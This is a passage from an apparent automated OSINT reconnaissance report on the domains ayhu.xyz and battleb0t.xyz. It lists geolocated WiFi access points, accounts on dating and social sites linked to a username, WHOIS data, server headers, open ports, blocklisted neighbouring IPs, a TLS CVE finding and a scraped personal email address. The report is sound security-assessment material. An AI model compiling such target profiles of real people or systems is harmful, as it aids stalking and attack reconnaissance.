j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'EHiPHm0Nl3GyThu9m1wbXjiHVtOqC3bOZB5NH6FZ4WpN/ont8bhxVwykMxIfoGSCjD8SpsL131biQUzVmplSkmz36+Rbm6LpKDPgFi1SZ6sdv468aKRPGhyFreJfGyRxilqUy5qO2EhnuYwrJjSxEU6DGEUFnqpvxw46fNgsaBRKOJ+bUVrPyznWm3WWDmCZ5I4ByfgFEH/V+llAilan1spVCzgSbbNaZnK7v2zKybgKpcf37StU8tcqkL0luzxFnWpTYEMJIRNh3502IKGm2GeIGVQUP6IIgH3pam7apk2jk/MVIAQ55tOJt6IZrTr1Qcj4biXsY3FIPVNAc0sCXlUyI683VVNAnv7kxmJ0SLq0ELP7CILJKsuRkOc2+1w90SBLDbAqCH/GEPeh86EVOXxwcNFZqRIljefJbQxhuH4JevbkysQYXa6LkLXsD5QKQE0OPjJQvEC2SmVFUO8wuJE/HZ29m2obUyVypKKxYzEuV7pCj1nVwt32aW4bF0deBcy4/M4CeO4Epb9dj4xmVGUtKMp/g+OZaEvQnjUgBRlg57NTUuvDL1hFtL478NEE',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:B1:75:22) | 39.0469, -77.4903 |
| 2023-05-12 02:45:26 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.71.14', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 104.21.71.14 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | vsco (Category: social)
https://vsco.co/login/gallery | login |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Brandis Wifi 5GHz (Net ID: 00:01:9F:20:CA:54) | 34.0544, -118.244 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTFhSfWa2 (Net ID: B0:DA:F9:7C:BB:40) | 37.751, -97.822 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Domain Name: 001VIET.COM
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-10-01T07:27:47Z
Creation Date: 2022-03-31T20:18:54Z
Registry Expiry Date: 2024-03-31T20:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 001viet.com
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-03-31T15:18:54Z
Creation Date: 2022-03-31T15:18:54Z
Registrar Registration Expiration Date: 2024-03-31T15:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:15 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1620 Guest (Net ID: 00:01:21:30:37:7F) | 52.3759, 4.8975 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Lifestyle (Net ID: 00:06:25:61:2F:2E) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 02:53:35 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.110.0/24 | 185.199.110.153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:04:05) | 50.8897, 6.0563 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MGOKCEN (Net ID: 00:14:C1:20:BB:F4) | 40.2024, 29.0398 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Kircal3 (Net ID: 00:14:C1:15:7B:C1) | 40.2024, 29.0398 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DATAVO (Net ID: 00:02:61:19:70:44) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | meet me (Category: dating)
https://www.meetme.com/login | login |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/kappi_2.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:31:23 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [165.232.112.0/20]
http://lists.blocklist.de/lists/all.txt | 165.232.112.0/20 |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.109): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:58 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 1 | 3 | 0 | None | OpenPhish [netlify.app]
https://www.openphish.com/feed.txt | netlify.app |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | kik (Category: social)
https://ws2.kik.com/user/ayhu | ayhu |
| 2023-05-12 02:59:52 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | l@allledglobal.com | |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:08:2F:54) | 50.1188, 8.6843 |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:80 | 188.114.97.0/24 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.243): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | My Passport (2.4 GHz) - 084071 (Net ID: 00:00:C0:08:40:71) | 50.1188, 8.6843 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/ayhu | ayhu |
| 2023-05-12 03:12:41 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 188.114.97.1 |
| 2023-05-12 03:00:48 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.64): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | United States | githubusercontent.com |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:80 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-fastly-request-id: 47e9025f17d9e6e936d804b3c00d7989ec4a827a | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | mery.robinson@ftb.ca.gov | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://click9.bigmarker.com/links/BY79pHvYX2Z/QPJiO7I68/tMwYeVPDKIXG/IN5CQt3PP-?bu=7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff5125d2b050eecdfd56122f5766da81f9380883c6330281152549d890a090250ca7457e3d6af512de37a44ef72cc832a7cff15e41cb02af8a17863d1d3fd8b23804d4f2277ba16828665e73cb7759a78343309ede93ee8fcceaf565cf60789ea78d923ffa76fe3d', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:2872:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:2872:120:WilError_01"\n "SM0:2872:120:WilError_01"\n "SM0:2872:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.231.70.218:443"\n "138.91.254.96:443"\n "3.235.65.215:443"\n "13.227.21.122:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "151.101.0.176:443"\n "142.251.2.156:443"\n "151.101.2.137:443"\n "162.247.241.14:443"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "click9.bigmarker.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: 
"urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: 
